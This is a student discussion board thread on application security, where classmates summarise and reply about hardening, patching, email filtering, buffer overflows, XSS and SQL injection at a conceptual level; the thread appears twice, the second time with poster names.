Application security is the discipline of processes, tools, and practices designed to protect applications from threats throughout the application lifecycle. Cybercriminals are organized and very professional. Their goal is to find and exploit vulnerabilities and incorporate applications to steal data, intellectual property, and sensitive information.
Most successful attacks are aimed at exploitable vulnerabilities in the application layer, which shows that corporate IT departments need to be more vigilant about application security. The number and complexity of applications continue to grow, making the problem even more complicated. Ten years ago, the software security challenge was to protect desktop applications and static websites, which were fairly harmless and easy to scope and protect. Now, considering outsourcing development, the number of legacy applications, and internal development using third-party, open-source, and commercial, off-the-shelf software components, the software supply chain has become more complex.
Application security solutions must test whether there are potential vulnerabilities that can be exploited in Web applications, be able to analyze code, and help manage security and development management processes by coordinating work and facilitating collaboration between various stakeholders. The solution must also provide application security testing that is easy to use and deploy.
Hi Zibai, application can be different from operating system in terms of security. There are many applications. For operating system, there are only a handful of vendors that provide operating system, but there are many application software company that provide service and make their patch update.
The mechanics of vulnerabilities, exploits, patches, and work-around are not fundamentally different for operating systems and applications. The main difference is the small number of operating systems that most firms support versus the large number of applications they typically use. For operating systems, most enterprise only have to deal with a handful of vendors about vulnerabilities, patches, and work arounds. In terms of application, companies might use many different applications from many different companies, which, might have many different types of vulnerabilities. The lion’s share of all vulnerabilities. Just finding information about vulnerabilities and fixes can be a maddening chore because each vendor releases information about its products’ vulnerabilities and fixes in its own way. Although various vulnerability tracking services help (especially BugTraq at SecurityFocus.com), server administrators have to visit their application vendors’ websites frequently. After the firm finds patches, it must download and install the patches. Adding to the confusion, each vendor has different mechanisms for downloading and installing patches.
One key point I learned from Chapter 8 was the application that minimizes the host operation to mitigate network risk. Installed applications are potential points of attack and consume computer resources. Therefore, services that are not necessary should be disabled. Other controls that can help protect your application include:
• Create secure configurations; Create a security configuration based on a baseline. For example, delete the default password.
• Install application patches and updates; Ensure that all application patches are installed for new vulnerabilities and new versions of software.
• Minimize applications for permits; Only necessary programs can be run with root privileges. Other programs can run at a minimum.
• Add application-level authentication, authorization, and auditing; Appropriate access and authentication methods should be used.
The chapter talks about buffer overflow attacks which is the most widespread vulnerability in application programs. Buffer is basically a memory storage that temporary holds data while it is being transferred from one location to another. A buffer overflow is when there is more data in a buffer than it can handle causing data to overflow into adjacent memory space. This vulnerability can crash a system. Attackers exploit buffer overflow issues by overwriting the memory of an application. This changes the execution path of the application which damages files. One of the ways to prevent buffer overflow vulnerabilities in the applications is to keep them up to date with the latest security patches. Hackers take advantage of security vulnerabilities as soon as they are made public so it’s always a better to deploy security patches as soon as they become available.
Priyanka,
Thank you very much for the extra info on Buffer Overflows!
It has been a while since I learned about it. I forget which class at Drexel.
I am going to revisit all of this. Now would be a great time if I had the time I thought I was going to have by working from home. I actually feel like I have less time!
Hopefully, we start to head back to normalcy soon with low death tolls. It’s crazy!
Stay safe!
I love the part about software development and the process of moving software in three different server environments: development server, test server, and production server. The idea is that developers can access the code on the development server, that’s all. They only submit the code to the environment. Then the code is moved to the test environment, and developers no longer have the right to access it. Testers can access and complete their testing and quality assurance processes. The code then enters the production environment. In production, developers and testers do not have access rights. By using this method, it has very strong control over development management. Untested or unsafe code cannot simply enter the production environment. The question is: if one day the production environment crumbled, how many companies had such a structure: first, repair the code in the development environment, then submit it to the test environment, and then submit it to the production environment. To restore online quickly, some companies may ask their programmers to supervise and solve this problem as soon as possible. This is something we must avoid.
Hi Haozhe,
Thanks for your sharing. As auditors, we will need to look at the organization from a macro perspective from the beginning. Understanding how their physical environment directly affects their virtual environment is key. Then, by securing the physical devices, we add another layer to their virtual information assets before we even open any of them. In turn, I agree that uploading the latest applications to mitigate security vulnerabilities is an important step toward fully protecting information assets.
One essential Internet application I noticed is E-mail, and email filtering is most common way to anti dangerous or inappropriate content. One type of e-mail which will be filtered is attached harmful content, it may contain viruses, worms, and other malicious code; and another usual type is spam, most users are deluged by that and spam accounts for 60 to 90 percent of all Internet mail traffic on any given day. Email filtering can apply to the intervention of human intelligence, but most often refers to the automatic processing of messages at an SMTP server, possibly applying anti-spam techniques. Filtering can be applied to incoming emails as well as to outgoing ones. Traditionally, the process of e-mail malware and spam filtering id implement on the client’s PCs, but users often turn it off and it will impact the updated of filtering. Based on that, most companies now use filtering at the corporate e-mail server as the primary line of defense for e-mail. And due to the labor burdens of e-mail security, some companies transform to using the e-mail managed service providers, which is cheaper and more professional.
I chose the same section as I felt it has the most correlation to me in my position at work. Our system does a good job of filtering most phishing and malicious emails, however every once in a while one will come through. Most of the time when it gets through it is very obvious, however there have been times where they are disguised and it is something as simple as opening that email that can begin the domino effect of a security breakdown in the system.
One key takeaway from this chapter was the information about the email servers being leveraged for attacks more often than they had been in the past. The ability to add attachments to emails makes them a very interesting attack surface for exploitations. Recently there was a very large vulnerability related to MFST Exchange servers. Organizations could have had their emails being monitored or ransomware being passed through their company. The email server is extremely important and must be protected properly in order to prevent huge losses.
Hi Jonathan,
Thank you for such a great insight importance of security for email servers. I totally agree with you! The ability of attackers to add attachments and links makes email one of the most popular mediums of attack. I agree that it is critical for organizations to have email filters and monitoring systems implemented to protect their information assets. I think this is also critical for Instant messenger softwares and tools like Microsoft teams and slack as they gain more and more popularity now compared to email. these tools are now instant means of communication among employees. they also allow users to share much larger files than email servers which can propose a greater risk.
The key takeaways from this chapter are the different types of attacks that can occur when an application is insecure. These attacks include buffer overflow, login screen bypass, cross-site scripting (XSS), and SQL injection. Buffer overflow attacks involve sending code that purposely is too much information for the RAM allocated for the application, and depending on the application can crash the server or allow any code to be executed. Login screen bypasses can occur if the developer doesn’t patch URLs past a login screen that allows any user to access the site. XSS attacks are when attackers use legitimate URLs as a base, but makes them too long for users to see the end in an email attachment, and the end of the URL executes a script for the attacker to perform a myriad of tasks. Lastly is SQL injection attacks, which occurs placing SQL code in a string query that should only be accepting string inputs.
The execution of arbitrary code in a buffer overflow attack can pose severe dangers to the system and network at large. An example would be an attacker managing to initiate a control command attack this way, then using the nodes on the network to as zombies to conduct a DDoS attack either on other networked systems in the organization or external to the organization. The possibilities for attacks and vulnerabilities can seem endless in such situations.
Application security is a lot more difficult than hardening the operating system because the clients and servers may run on multiple applications. Each application may be as difficult to harden as an operating system. The ease of hacking into an application can be as simple as running a single command, and it is currently the dominant hacking vector today.
To harden an application, there is a process the organization should go through to understand the environment that needs protection. The first step would be to understand the server’s role and threat environment, in extremely dangerous environments, remote administration may have to be disabled as well. The firm should also minimize main applications, the fewer applications the host runs, the fewer opportunities to be hacked. Having application patches and updates implemented is also crucial in protecting the application against KNOWN and exposed threats. There are many ways of securing the application including encrypting the system, adding application-level authentication, enabling logging, and giving the application the least privilege needed.
I agree that with hardening, certain protocols such as RDP should be disabled if they have limited or no use to the organization. Unfortunately, many organizations rely on certain ports to stay open, and those ports will always have a chance to be exploited.
The section that stood out to me was the email security. Email is such an integral part of individuals lives but also organizations. It provides a way to move information within the network but a lot of this time the info needs to be secure as it can be sensitive. The issue is that attackers know this and email is one of the harder avenues to secure, therefore it is more exploited than other areas. Companies have software in place to assist with filtering emails, thus keeping junk from getting to an employee’s eyes with the goal of mitigating phishing attacks. The problem with this is that the system often over filters and information or emails we do need end up getting caught in that net. The attack usually is code within attachments and HTML bodies, thus gaining access to the system when clicked and the user may not even know if the email looks legitimate.
Hi, Austin. I like you point out how email affects our daily work. Email is an essential communication tool to connect with people. Our emails are linked to many different websites, including social media, e-commercial websites, and governmental websites. If our emails are in the cyber incident, we need to disable all accounts, which are linked to the email.
PC users are a major target attacked through the browser. Once the user was compromised from the data stored on the user’s PC, the cybercriminals can use this user’s system to attack other systems, to which the user can access credentials. Because Microsoft Windows built-in many Active X, and it leads some malicious sites to apply the Active X for installing viruses or backdoors automatically. By using the scripting languages, the attacker can modify and add the file content, access login information, or can execute an external executable file directly from the browser. Even though the Microsoft Edge browser does not support Active X and replace Internet Explorer, Windows 10 continues Internet Explorer 11 built-in for users to choose from.
Hi Cami,
I agree PCs are a large attack target, Microsoft should really figure out a way to remediate these outdated add-ons with common vulnerabilities like Active X. Another reason why PCs are so commonly attacked is that how to open-source the systems are. Compared to Apple’s closed system models, Windows vulnerabilities are more commonly disclosed in forums and exploited because of the visibility.
One takeaway from this chapter is the difference between WWW service and E-Commerce service. The book refers to WWW service as the basic functionality of HTTP web servers that are responsible for retrieving static and dynamic web pages on the software installed on the server. The two main web servers are Microsoft’s IIS and Linux Apache server. E-Commerce service refers to the additional functionality a website uses for buying and selling product, integration to external and internal applications, handling shipping information, etc. Although, organization’s create their own custom software to support some e-commerce functionality, the process cannot be complete alone. For example, in a checkout process, the software needs to be integrated with multiple credit card providers so that it can be accepted as a payment type. To accept VISA, there needs to be integration with VISA’s backend systems to process a transaction.
Hi, Anthony, Thank you for sharing your points, I agree with your points. Also the WWW Service and E-Commerce Security have lots of disadvantages, firstly, it will have the cost of disruptions, and it will have the harm to reputation and market capitalization. Secondly, it will cause the customer fraud. Thirdly, it will increase the exposure of sensitive private information.
I use SQL on a daily basis as a Business Analyst. I am constantly querying the database for things that my client may need, especially during data migration from a legacy system into the new implementation of financial software. As such, the section on SQL injections stood out to me. SQL attacks send modified queries to try to modify the database of an application. It can also execute commands on a server.
My key take away from this chapter was the Attack Methods Using SQL Injection.
– In-band injections which extract data from the DB and makes it public in a web browser
– Out-of-Band uses malformed statement to extract data from sources like email instead of directly from the DB.
– Inferential injection extract metadata from the DB about the DB itself.
Error-based inference assumes the DB receives a query based on error messages.
Blind injection uses multiple statements that work together causing a single error message to be generated for different types of errors. This could be a serious attack as it could put the system in a loop of performing a trivial task a million times for example.
Measures can be taken to protect a DB from a SQL injection attack by parameterizing and sanitizing queries. Also limiting permissions required to run the web app and using stored procedures.
The key point that I took away from this chapter is the WWW service and E-commerce service. We will use the term WWW service for the basic functionality of HTTP webservers, including the retrieval of static files (fixed webpages) and the creation of dynamic webpages (webpages created in response to a specific query) using software on the webserver. We will use the term e-commerce service to refer to the additional software needed for buying and selling, including online catalogs, shopping carts, checkout functions, connections to back-end databases within the firm, and links to outside organizations, such as banks.
The WWW Service and E-Commerce Security have lots of disadvantages, firstly, it will have the cost of disruptions, and it will have the harm to reputation and market capitalization. Secondly, it will cause the customer fraud. Thirdly, it will increase the exposure of sensitive private information.
Hi Zhen,
I think your point about WWW service has a lot disadvantages is very interesting. The Web has become the main means for many people to find and browse information on the Internet. You can set up a WEB server on the LINUX host and store your homepage on your own WEB server, and publish your homepage to the outside through it.
E-mail filtering is an important part of an organization. The SMTP protocol and POP3 protocol are mainly used in the mail delivery process. Among them, the client uses the SMTP protocol when sending mail to the mail server, and the client uses the POP3 protocol when receiving mail from the mail server. From the perspective of the mail server, spam and emails with harmful content are all delivered to the user mailbox of the mail server through the SMTP protocol. Therefore, filtering external mail delivered to the local mail server through the SMTP protocol achieves the purpose of protecting local mail users from spam, reactionary mail, etc.
The basis of mail filtering is filtering rules. In order to achieve effective mail filtering, multi-level mail filtering rules need to be formulated. The filtering algorithm performed by the system according to the filtering rules should have a certain degree of intelligence.
One of the topics that I found interesting this week is SQl injection Attacks. When database access is being implemented, the user may be prompted for certain information, such as a username, password, or account pin code. This input is then tested with an SQL query. For instance, if you type your name, the string you type, $name, may be input into an SQL query to find your address. If input checking is not done, or poorly done, an attacker may be able to use SQL injection to enter a string that includes both the user’s name and more SQL query.
I also found the different types of SQL injection attacks interesting. Whether it is an in-band that extracts data directly from the database or an out of band attack that uses improperly formed SQL statements to extract data through a different application, there are many methods to create a SQL injection attack.
The section on web security really stood out. It seems that many times an attackers first entry way into a network is going to be through the internet facing web server. Attackers like to leverage scripting languages such as java script or VBScript to inject code into a webpage. Malicious script attacks allows attackers to execute any command they choose on a victim’s computer many times in the form of a command shell. Attackers also leverage website cookies which is a small text string that the website owner can place on a client computer. If an attacker is able to get a user to visit a malicious website through social engineering for example, cookies can places in the user’s browser. These cookies then be harvested for login names and passwords.
Hi Anthony,
The most vulnerable point of entry for attackers is always an outward facing system/application. Most organizations focus on protecting their web-servers, without knowing all other systems and applications they may have that are accessible from the outside. Sometimes such applications can have components that are accessible to their business partners and vendors only. However, if those external entities are compromised then they put them at risk as well.
Under application security, a key component to hardening applications is security baselines for application minimization. This enables security professionals to either reduce the number of applications or at least reduce the number of services that are not necessarily being used by applications. These two options greatly reduce the attack surface hence work towards hardening the systems at large. Disabling superfluous apps and services is a basic step to reducing the amount of logging and monitoring that must be done to secure the system.
Another concept is securing custom applications that are in use within the organization. The first and best way to start is by ensuring that all user input is validated or checked in some way before being forwarded within/between applications. This validation can prevent a wide range of known attacks such as SQL injections and even cross-site scripting attacks to some extent. Securing applications and all their components is a vital step in ensuring the system is well hardened.
I learned about the steps one can take to harden applications including first knowing the servers role by minimizing the number of applications running on a server so only the services needed to run the application are on the server and all other extraneous services are disabled or uninstalled. After understanding the server’s role, then steps like physical security, backup, hardening OS, minimizing applications, defining subsidiary applications and using baselines to guide security set-up on the server can be completed. The application should be configured to go beyond default configuration by specifying services and database accounts, hardware and devices that it interacts with and rejecting all other network traffic and changing the default passwords. The application should be kept up to date and patched and the permissions of the application should be minimized to just what is needed to run the application. The application should also own the authentication, authorization and auditing at the application layer. Cryptography should be enabled for all communication with users. These steps are steps taken to harden the application.
Zibai Yang says
Application security is the discipline of processes, tools, and practices designed to protect applications from threats throughout the application lifecycle. Cybercriminals are organized and very professional. Their goal is to find and exploit vulnerabilities and incorporate applications to steal data, intellectual property, and sensitive information.
Most successful attacks are aimed at exploitable vulnerabilities in the application layer, which shows that corporate IT departments need to be more vigilant about application security. The number and complexity of applications continue to grow, making the problem even more complicated. Ten years ago, the software security challenge was to protect desktop applications and static websites, which were fairly harmless and easy to scope and protect. Now, considering outsourcing development, the number of legacy applications, and internal development using third-party, open-source, and commercial, off-the-shelf software components, the software supply chain has become more complex.
Application security solutions must test whether there are potential vulnerabilities that can be exploited in Web applications, be able to analyze code, and help manage security and development management processes by coordinating work and facilitating collaboration between various stakeholders. The solution must also provide application security testing that is easy to use and deploy.
Ting-Yen Huang says
Hi Zibai, application can be different from operating system in terms of security. There are many applications. For operating system, there are only a handful of vendors that provide operating system, but there are many application software company that provide service and make their patch update.
Ting-Yen Huang says
The mechanics of vulnerabilities, exploits, patches, and work-around are not fundamentally different for operating systems and applications. The main difference is the small number of operating systems that most firms support versus the large number of applications they typically use. For operating systems, most enterprise only have to deal with a handful of vendors about vulnerabilities, patches, and work arounds. In terms of application, companies might use many different applications from many different companies, which, might have many different types of vulnerabilities. The lion’s share of all vulnerabilities. Just finding information about vulnerabilities and fixes can be a maddening chore because each vendor releases information about its products’ vulnerabilities and fixes in its own way. Although various vulnerability tracking services help (especially BugTraq at SecurityFocus.com), server administrators have to visit their application vendors’ websites frequently. After the firm finds patches, it must download and install the patches. Adding to the confusion, each vendor has different mechanisms for downloading and installing patches.
Wenyao Ma says
One key point I learned from Chapter 8 was the application that minimizes the host operation to mitigate network risk. Installed applications are potential points of attack and consume computer resources. Therefore, services that are not necessary should be disabled. Other controls that can help protect your application include:
• Create secure configurations; Create a security configuration based on a baseline. For example, delete the default password.
• Install application patches and updates; Ensure that all application patches are installed for new vulnerabilities and new versions of software.
• Minimize applications for permits; Only necessary programs can be run with root privileges. Other programs can run at a minimum.
• Add application-level authentication, authorization, and auditing; Appropriate access and authentication methods should be used.
Priyanka Ranu says
The chapter talks about buffer overflow attacks which is the most widespread vulnerability in application programs. Buffer is basically a memory storage that temporary holds data while it is being transferred from one location to another. A buffer overflow is when there is more data in a buffer than it can handle causing data to overflow into adjacent memory space. This vulnerability can crash a system. Attackers exploit buffer overflow issues by overwriting the memory of an application. This changes the execution path of the application which damages files. One of the ways to prevent buffer overflow vulnerabilities in the applications is to keep them up to date with the latest security patches. Hackers take advantage of security vulnerabilities as soon as they are made public so it’s always a better to deploy security patches as soon as they become available.
Haozhe Lin says
Priyanka,
Thank you very much for the extra info on Buffer Overflows!
It has been a while since I learned about it. I forget which class at Drexel.
I am going to revisit all of this. Now would be a great time if I had the time I thought I was going to have by working from home. I actually feel like I have less time!
Hopefully, we start to head back to normalcy soon with low death tolls. It’s crazy!
Stay safe!
Haozhe Lin says
I love the part about software development and the process of moving software in three different server environments: development server, test server, and production server. The idea is that developers can access the code on the development server, that’s all. They only submit the code to the environment. Then the code is moved to the test environment, and developers no longer have the right to access it. Testers can access and complete their testing and quality assurance processes. The code then enters the production environment. In production, developers and testers do not have access rights. By using this method, it has very strong control over development management. Untested or unsafe code cannot simply enter the production environment. The question is: if one day the production environment crumbled, how many companies had such a structure: first, repair the code in the development environment, then submit it to the test environment, and then submit it to the production environment. To restore online quickly, some companies may ask their programmers to supervise and solve this problem as soon as possible. This is something we must avoid.
Wenyao Ma says
Hi Haozhe,
Thanks for your sharing. As auditors, we will need to look at the organization from a macro perspective from the beginning. Understanding how their physical environment directly affects their virtual environment is key. Then, by securing the physical devices, we add another layer to their virtual information assets before we even open any of them. In turn, I agree that uploading the latest applications to mitigate security vulnerabilities is an important step toward fully protecting information assets.
Xinyi Zheng says
One essential Internet application I noticed is E-mail, and email filtering is most common way to anti dangerous or inappropriate content. One type of e-mail which will be filtered is attached harmful content, it may contain viruses, worms, and other malicious code; and another usual type is spam, most users are deluged by that and spam accounts for 60 to 90 percent of all Internet mail traffic on any given day. Email filtering can apply to the intervention of human intelligence, but most often refers to the automatic processing of messages at an SMTP server, possibly applying anti-spam techniques. Filtering can be applied to incoming emails as well as to outgoing ones. Traditionally, the process of e-mail malware and spam filtering id implement on the client’s PCs, but users often turn it off and it will impact the updated of filtering. Based on that, most companies now use filtering at the corporate e-mail server as the primary line of defense for e-mail. And due to the labor burdens of e-mail security, some companies transform to using the e-mail managed service providers, which is cheaper and more professional.
Austin Mecca says
Xinyi,
I chose the same section as I felt it has the most correlation to me in my position at work. Our system does a good job of filtering most phishing and malicious emails, however every once in a while one will come through. Most of the time when it gets through it is very obvious, however there have been times where they are disguised and it is something as simple as opening that email that can begin the domino effect of a security breakdown in the system.
Jonathan Castelli says
One key takeaway from this chapter was the information about the email servers being leveraged for attacks more often than they had been in the past. The ability to add attachments to emails makes them a very interesting attack surface for exploitations. Recently there was a very large vulnerability related to MFST Exchange servers. Organizations could have had their emails being monitored or ransomware being passed through their company. The email server is extremely important and must be protected properly in order to prevent huge losses.
Prince Patel says
Hi Jonathan,
Thank you for such a great insight importance of security for email servers. I totally agree with you! The ability of attackers to add attachments and links makes email one of the most popular mediums of attack. I agree that it is critical for organizations to have email filters and monitoring systems implemented to protect their information assets. I think this is also critical for Instant messenger softwares and tools like Microsoft teams and slack as they gain more and more popularity now compared to email. these tools are now instant means of communication among employees. they also allow users to share much larger files than email servers which can propose a greater risk.
Krish Damany says
The key takeaways from this chapter are the different types of attacks that can occur when an application is insecure. These attacks include buffer overflow, login screen bypass, cross-site scripting (XSS), and SQL injection. Buffer overflow attacks involve sending code that purposely is too much information for the RAM allocated for the application, and depending on the application can crash the server or allow any code to be executed. Login screen bypasses can occur if the developer doesn’t patch URLs past a login screen that allows any user to access the site. XSS attacks are when attackers use legitimate URLs as a base, but makes them too long for users to see the end in an email attachment, and the end of the URL executes a script for the attacker to perform a myriad of tasks. Lastly is SQL injection attacks, which occurs placing SQL code in a string query that should only be accepting string inputs.
Humbert Amiani says
Hi Krish,
The execution of arbitrary code in a buffer overflow attack can pose severe dangers to the system and network at large. An example would be an attacker managing to initiate a control command attack this way, then using the nodes on the network to as zombies to conduct a DDoS attack either on other networked systems in the organization or external to the organization. The possibilities for attacks and vulnerabilities can seem endless in such situations.
Mei X Wang says
Application security is a lot more difficult than hardening the operating system because the clients and servers may run on multiple applications. Each application may be as difficult to harden as an operating system. The ease of hacking into an application can be as simple as running a single command, and it is currently the dominant hacking vector today.
To harden an application, there is a process the organization should go through to understand the environment that needs protection. The first step would be to understand the server’s role and threat environment, in extremely dangerous environments, remote administration may have to be disabled as well. The firm should also minimize main applications, the fewer applications the host runs, the fewer opportunities to be hacked. Having application patches and updates implemented is also crucial in protecting the application against KNOWN and exposed threats. There are many ways of securing the application including encrypting the system, adding application-level authentication, enabling logging, and giving the application the least privilege needed.
Krish Damany says
Hi Mei,
I agree that with hardening, certain protocols such as RDP should be disabled if they have limited or no use to the organization. Unfortunately, many organizations rely on certain ports to stay open, and those ports will always have a chance to be exploited.
Austin Mecca says
The section that stood out to me was the email security. Email is such an integral part of individuals lives but also organizations. It provides a way to move information within the network but a lot of this time the info needs to be secure as it can be sensitive. The issue is that attackers know this and email is one of the harder avenues to secure, therefore it is more exploited than other areas. Companies have software in place to assist with filtering emails, thus keeping junk from getting to an employee’s eyes with the goal of mitigating phishing attacks. The problem with this is that the system often over filters and information or emails we do need end up getting caught in that net. The attack usually is code within attachments and HTML bodies, thus gaining access to the system when clicked and the user may not even know if the email looks legitimate.
Cami Chen says
Hi, Austin. I like you point out how email affects our daily work. Email is an essential communication tool to connect with people. Our emails are linked to many different websites, including social media, e-commercial websites, and governmental websites. If our emails are in the cyber incident, we need to disable all accounts, which are linked to the email.
Cami Chen says
PC users are a major target attacked through the browser. Once the user was compromised from the data stored on the user’s PC, the cybercriminals can use this user’s system to attack other systems, to which the user can access credentials. Because Microsoft Windows built-in many Active X, and it leads some malicious sites to apply the Active X for installing viruses or backdoors automatically. By using the scripting languages, the attacker can modify and add the file content, access login information, or can execute an external executable file directly from the browser. Even though the Microsoft Edge browser does not support Active X and replace Internet Explorer, Windows 10 continues Internet Explorer 11 built-in for users to choose from.
Mei X Wang says
Hi Cami,
I agree PCs are a large attack target, Microsoft should really figure out a way to remediate these outdated add-ons with common vulnerabilities like Active X. Another reason why PCs are so commonly attacked is that how to open-source the systems are. Compared to Apple’s closed system models, Windows vulnerabilities are more commonly disclosed in forums and exploited because of the visibility.
Anthony Wong says
One takeaway from this chapter is the difference between WWW service and E-Commerce service. The book refers to WWW service as the basic functionality of HTTP web servers that are responsible for retrieving static and dynamic web pages on the software installed on the server. The two main web servers are Microsoft’s IIS and Linux Apache server. E-Commerce service refers to the additional functionality a website uses for buying and selling product, integration to external and internal applications, handling shipping information, etc. Although, organization’s create their own custom software to support some e-commerce functionality, the process cannot be complete alone. For example, in a checkout process, the software needs to be integrated with multiple credit card providers so that it can be accepted as a payment type. To accept VISA, there needs to be integration with VISA’s backend systems to process a transaction.
Zhen Li says
Hi, Anthony, Thank you for sharing your points, I agree with your points. Also the WWW Service and E-Commerce Security have lots of disadvantages, firstly, it will have the cost of disruptions, and it will have the harm to reputation and market capitalization. Secondly, it will cause the customer fraud. Thirdly, it will increase the exposure of sensitive private information.
Vanessa Marin says
I use SQL on a daily basis as a Business Analyst. I am constantly querying the database for things that my client may need, especially during data migration from a legacy system into the new implementation of financial software. As such, the section on SQL injections stood out to me. SQL attacks send modified queries to try to modify the database of an application. It can also execute commands on a server.
My key take away from this chapter was the Attack Methods Using SQL Injection.
– In-band injections which extract data from the DB and makes it public in a web browser
– Out-of-Band uses malformed statement to extract data from sources like email instead of directly from the DB.
– Inferential injection extract metadata from the DB about the DB itself.
Error-based inference assumes the DB receives a query based on error messages.
Blind injection uses multiple statements that work together causing a single error message to be generated for different types of errors. This could be a serious attack as it could put the system in a loop of performing a trivial task a million times for example.
Measures can be taken to protect a DB from a SQL injection attack by parameterizing and sanitizing queries. Also limiting permissions required to run the web app and using stored procedures.
Zhen Li says
The key point that I took away from this chapter is the WWW service and E-commerce service. We will use the term WWW service for the basic functionality of HTTP webservers, including the retrieval of static files (fixed webpages) and the creation of dynamic webpages (webpages created in response to a specific query) using software on the webserver. We will use the term e-commerce service to refer to the additional software needed for buying and selling, including online catalogs, shopping carts, checkout functions, connections to back-end databases within the firm, and links to outside organizations, such as banks.
The WWW Service and E-Commerce Security have lots of disadvantages, firstly, it will have the cost of disruptions, and it will have the harm to reputation and market capitalization. Secondly, it will cause the customer fraud. Thirdly, it will increase the exposure of sensitive private information.
Junhan Hao says
Hi Zhen,
I think your point about WWW service has a lot disadvantages is very interesting. The Web has become the main means for many people to find and browse information on the Internet. You can set up a WEB server on the LINUX host and store your homepage on your own WEB server, and publish your homepage to the outside through it.
Junhan Hao says
E-mail filtering is an important part of an organization. The SMTP protocol and POP3 protocol are mainly used in the mail delivery process. Among them, the client uses the SMTP protocol when sending mail to the mail server, and the client uses the POP3 protocol when receiving mail from the mail server. From the perspective of the mail server, spam and emails with harmful content are all delivered to the user mailbox of the mail server through the SMTP protocol. Therefore, filtering external mail delivered to the local mail server through the SMTP protocol achieves the purpose of protecting local mail users from spam, reactionary mail, etc.
The basis of mail filtering is filtering rules. In order to achieve effective mail filtering, multi-level mail filtering rules need to be formulated. The filtering algorithm performed by the system according to the filtering rules should have a certain degree of intelligence.
Prince Patel says
One of the topics that I found interesting this week is SQl injection Attacks. When database access is being implemented, the user may be prompted for certain information, such as a username, password, or account pin code. This input is then tested with an SQL query. For instance, if you type your name, the string you type, $name, may be input into an SQL query to find your address. If input checking is not done, or poorly done, an attacker may be able to use SQL injection to enter a string that includes both the user’s name and more SQL query.
Heather Ergler says
I also found the different types of SQL injection attacks interesting. Whether it is an in-band that extracts data directly from the database or an out of band attack that uses improperly formed SQL statements to extract data through a different application, there are many methods to create a SQL injection attack.
Anthony Messina says
The section on web security really stood out. It seems that many times an attackers first entry way into a network is going to be through the internet facing web server. Attackers like to leverage scripting languages such as java script or VBScript to inject code into a webpage. Malicious script attacks allows attackers to execute any command they choose on a victim’s computer many times in the form of a command shell. Attackers also leverage website cookies which is a small text string that the website owner can place on a client computer. If an attacker is able to get a user to visit a malicious website through social engineering for example, cookies can places in the user’s browser. These cookies then be harvested for login names and passwords.
Humbert Amiani says
Hi Anthony,
The most vulnerable point of entry for attackers is always an outward facing system/application. Most organizations focus on protecting their web-servers, without knowing all other systems and applications they may have that are accessible from the outside. Sometimes such applications can have components that are accessible to their business partners and vendors only. However, if those external entities are compromised then they put them at risk as well.
Humbert Amiani says
Under application security, a key component to hardening applications is security baselines for application minimization. This enables security professionals to either reduce the number of applications or at least reduce the number of services that are not necessarily being used by applications. These two options greatly reduce the attack surface hence work towards hardening the systems at large. Disabling superfluous apps and services is a basic step to reducing the amount of logging and monitoring that must be done to secure the system.
Another concept is securing custom applications that are in use within the organization. The first and best way to start is by ensuring that all user input is validated or checked in some way before being forwarded within/between applications. This validation can prevent a wide range of known attacks such as SQL injections and even cross-site scripting attacks to some extent. Securing applications and all their components is a vital step in ensuring the system is well hardened.
Heather Ergler says
I learned about the steps one can take to harden applications including first knowing the servers role by minimizing the number of applications running on a server so only the services needed to run the application are on the server and all other extraneous services are disabled or uninstalled. After understanding the server’s role, then steps like physical security, backup, hardening OS, minimizing applications, defining subsidiary applications and using baselines to guide security set-up on the server can be completed. The application should be configured to go beyond default configuration by specifying services and database accounts, hardware and devices that it interacts with and rejecting all other network traffic and changing the default passwords. The application should be kept up to date and patched and the permissions of the application should be minimized to just what is needed to run the application. The application should also own the authentication, authorization and auditing at the application layer. Cryptography should be enabled for all communication with users. These steps are steps taken to harden the application.